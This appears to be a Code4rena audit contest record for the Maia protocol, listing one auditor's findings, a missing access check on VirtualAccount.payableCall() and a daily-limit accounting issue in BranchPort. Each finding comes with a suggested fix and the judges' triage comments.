Platform: Code4rena
Start Date: 22/09/2023
Pot Size: $100,000 USDC
Total HM: 15
Participants: 175
Period: 14 days
Judge: alcueca
Total Solo HM: 4
Id: 287
League: ETH
Rank: 82/175
Findings: 2
Award: $25.79
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: 0xTheC0der
Also found by: 0x180db, 0xDING99YA, 0xRstStn, 0xTiwa, 0xWaitress, 0xblackskull, 0xfuje, 3docSec, Aamir, Black_Box_DD, HChang26, Hama, Inspecktor, John_Femi, Jorgect, Kek, KingNFT, Kow, Limbooo, MIQUINHO, MrPotatoMagic, NoTechBG, Noro, Pessimistic, QiuhaoLi, SovaSlava, SpicyMeatball, T1MOH, TangYuanShen, Vagner, Viktor_Cortess, Yanchuan, _eperezok, alexweb3, alexxander, ast3ros, ayden, bin2chen, blutorque, btk, ciphermarco, ether_sky, gumgumzum, gztttt, hals, imare, its_basu, joaovwfreire, josephdara, klau5, kodyvim, ladboy233, marqymarq10, mert_eren, minhtrng, n1punp, nobody2018, oada, orion, peakbolt, peritoflores, perseverancesuccess, pfapostol, rvierdiiev, stuxy, tank, unsafesol, ustas, windhustler, zambody, zzzitron
0.1127 USDC - $0.11
https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L85-L112 https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L66
Function VirtualAccount.payableCall() (https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L85-L112) aggregate calls ensuring each call is successful. The contract has a similar function for a single call call() (https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L66). This function has a modifier requiresApprovedCaller, which checks that the calling address is approved.
The VirtualAccount.payableCall() function is missing access check modifiers. It is a public function. It can be called by an attacker.
The input parameters of the VirtualAccount.payableCall() function are PayableCall[] calldata calls.
struct PayableCall { address target; bytes callData; uint256 value; }
Those. an attacker can control the low-level call in terms of target and callData. This vulnerability can lead to the theft of funds from a contract by sending them to any target address.
Manual review
Check access to the VirtualAccount.payableCall() function with at least the modifier requiresApprovedCaller
call/delegatecall
#0 - c4-pre-sort
2023-10-08T14:00:57Z
0xA5DF marked the issue as duplicate of #888
#1 - c4-pre-sort
2023-10-08T14:38:32Z
0xA5DF marked the issue as sufficient quality report
#2 - c4-judge
2023-10-26T11:28:27Z
alcueca marked the issue as satisfactory
🌟 Selected for report: MrPotatoMagic
Also found by: 0xAadi, 0xDING99YA, 0xDemon, 0xRstStn, 0xSmartContract, 0xStriker, 0xWaitress, 0xbrett8571, 0xfuje, 0xsagetony, 0xsurena, 33BYTEZZZ, 3docSec, 7ashraf, ABA, ABAIKUNANBAEV, Aamir, Audinarey, Bauchibred, Black_Box_DD, Daniel526, DanielArmstrong, DanielTan_MetaTrust, Dinesh11G, Eurovickk, Franklin, Inspecktor, John, Jorgect, Joshuajee, K42, Kek, Koolex, LokiThe5th, MIQUINHO, Myd, NoTechBG, QiuhaoLi, SanketKogekar, Sathish9098, Sentry, Soul22, SovaSlava, Stormreckson, Tendency, Topmark, Udsen, V1235816, Viktor_Cortess, Viraz, Yanchuan, ZdravkoHr, Zims, albahaca, albertwh1te, alexweb3, alexxander, ast3ros, audityourcontracts, bareli, bin2chen, bronze_pickaxe, c0pp3rscr3w3r, cartlex_, castle_chain, chaduke, debo, ether_sky, gumgumzum, imare, its_basu, jaraxxus, jasonxiale, josephdara, kodyvim, ladboy233, lanrebayode77, lsaudit, mert_eren, minhtrng, n1punp, nadin, niroh, nmirchev8, orion, peakbolt, perseverancesuccess, pfapostol, ptsanev, rvierdiiev, saneryee, shaflow2, te_aut, terrancrypt, twcctop, unsafesol, ustas, versiyonbir, windhustler, yongskiws, zhaojie, ziyou-
25.6785 USDC - $25.68
https://github.com/code-423n4/2023-09-maia/blob/main/src/BranchPort.sol#L144-L164 https://github.com/code-423n4/2023-09-maia/blob/main/src/BranchPort.sol#L167-L185
BranchPort.manage() (https://github.com/code-423n4/2023-09-maia/blob/main/src/BranchPort.sol#L144-L164) - allows active Port Strategy addresses to withdraw assets. The function includes checking the daily limit of the port strategy.
BranchPort.replenishReserves() (https://github.com/code-423n4/2023-09-maia/blob/main/src/BranchPort.sol#L167-L185) - allow approved address to repay borrowed reserves.
However, when the user calls BranchPort.manage(), the amount amount is subtracted from the daily limit: strategyDailyLimitRemaining[msg.sender][_token] = dailyLimit - _amount;
But, when the user calls BranchPort.replenishReserves() the amount returned is not added to the daily limit.
This is not true. When the user wants to call BranchPort.manage() again with an amount less than the daily limit plus the amount of funds redeemed today, he will not be able to do so. Although formally the daily limit has not been exceeded.
Manual review
Add the repaid amount to the daily limit
Context
#0 - c4-pre-sort
2023-10-08T06:01:08Z
0xA5DF marked the issue as primary issue
#1 - 0xA5DF
2023-10-08T06:01:18Z
Seems like intended design, but leaving open for sponsor to comment
#2 - c4-pre-sort
2023-10-08T14:46:45Z
0xA5DF marked the issue as sufficient quality report
#3 - c4-pre-sort
2023-10-12T16:14:17Z
0xA5DF marked the issue as duplicate of #694
#4 - c4-judge
2023-10-26T09:18:46Z
alcueca changed the severity to QA (Quality Assurance)
#5 - c4-judge
2023-10-26T09:19:08Z
alcueca marked the issue as grade-b